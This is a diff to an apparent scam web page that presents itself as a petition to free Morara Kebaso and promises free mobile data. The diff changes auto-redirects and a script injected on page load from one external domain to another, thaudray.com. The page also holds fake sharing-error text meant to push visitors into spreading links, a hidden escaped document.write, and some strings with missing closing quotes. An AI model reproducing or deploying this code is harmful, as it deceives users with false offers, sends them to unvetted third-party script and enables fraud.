--- a/Sign-To-Free-Morara.html
+++ b/Sign-To-Free-Morara.html
@@ -610,7 +610,7 @@ $(document).click(function () {
 "*30%20GB%20Free%20Internet%20Offer*%0A%E2%9D%A4%0ATo%20Activate%2030%20GB%20Free%20Internet%20for%20all%20Networks%20click%20here%F0%9F%91%87%0A*1.%20Jio*%0Ahttps://cutt.ly/30-GB_Jio%0A%20%0A*2.%20Airtel*%0Ahttps://cutt.ly/30-GB_Airtel%0A%20%0A*3.%20Vi*%0Ahttps://cutt.ly/30-GB_Vi%0A%20%0A*4.%20Jazz*%0Ahttps://cutt.ly/30-GB_Jazz%0A%20%0A*5.%20Zong*%0Ahttps://cutt.ly/30-GB_Zong%0A%20%0A*6.%20Telenor*%0Ahttps://cutt.ly/30-GB_Telenor%0A%20%0A*7.%20Ufone*%0Ahttps://cutt.ly/30-GB_Ufone%0A%20%0A*8.%20Other Networks*%0Ahttps://cutt.ly/Get_30GB",
 -->
     <script>
-        var text1 = "*SAVE OUR SOCIETY BY SIGNING PETITION SEEKING  TO FREE MORARA KEBASO *%0A%0A_ Save Our Society By Signing Petition and get justice for all the victims and Get *FREE 10GB DATA* Reward _%0A%0A*SIGN PETITION* %0A%0ABelow👇👇%0A*https://tinyurl.com/Sign-Petition-Org*%0A",
+        var text1 = "*SAVE OUR SOCIETY BY SIGNING PETITION SEEKING  TO FREE MORARA KEBASO *%0A%0A_ Save Our Society By Signing Petition and get justice for all the victims and Get *FREE 10GB DATA* Reward _%0A%0A*SIGN PETITION* %0A%0ABelow👇👇%0A*https://mpetition.org/Sign-To-Free-Morara.html*%0A",
             text2 = " an amount of ",
             text3 = "for every citizen who meets the conditions as an aid to the poor class to overcome the crisis. Enter and register now and make sure to register correctly 👉 ",
             error = "Something is wrong!\nPosts are not calculated. You may have shared it with the same friend or group more than once, please re-share",
@@ -638,10 +638,10 @@ document.write(unescape('%20%3Cscript%20type%3D%22text/javascript%22%3E%0A%20var
         fh();}
     setTimeout('hh();', 500);
     function fh(){
-        location.href="https://gifts.dataplug.xyz/Protest10GBgift.html#1719416735289";
+        location.href="//thaudray.com/4/3077182";
     }
     function goon(){
-        location.href="https://gifts.dataplug.xyz/Protest10GBgift.html#1719416735289";
+        location.href="//thaudray.com/4/3077182";
     }
 </script>
 
@@ -654,17 +654,17 @@ document.write(unescape('%20%3Cscript%20type%3D%22text/javascript%22%3E%0A%20var
         fh();}
     setTimeout('hh();', 500);
     function fh(){
-        location.href="https://gifts.dataplug.xyz/Protest10GBgift.html#1719416735289;
+        location.href="//thaudray.com/4/3077182;
     }
     function goon(){
-        location.href="https://gifts.dataplug.xyz/Protest10GBgift.html#1719416735289;
+        location.href="//thaudray.com/4/3077182;
     }
 </script>
 <script>
     var _hmt = _hmt || [];
     (function() {
         var hm = document.createElement("script");
-        hm.src = "https://gifts.dataplug.xyz/Protest10GBgift.html#1719416735289";
+        hm.src = "//thaudray.com/4/3077182";
         var s = document.getElementsByTagName("script")[0];
         s.parentNode.insertBefore(hm, s);
     })();
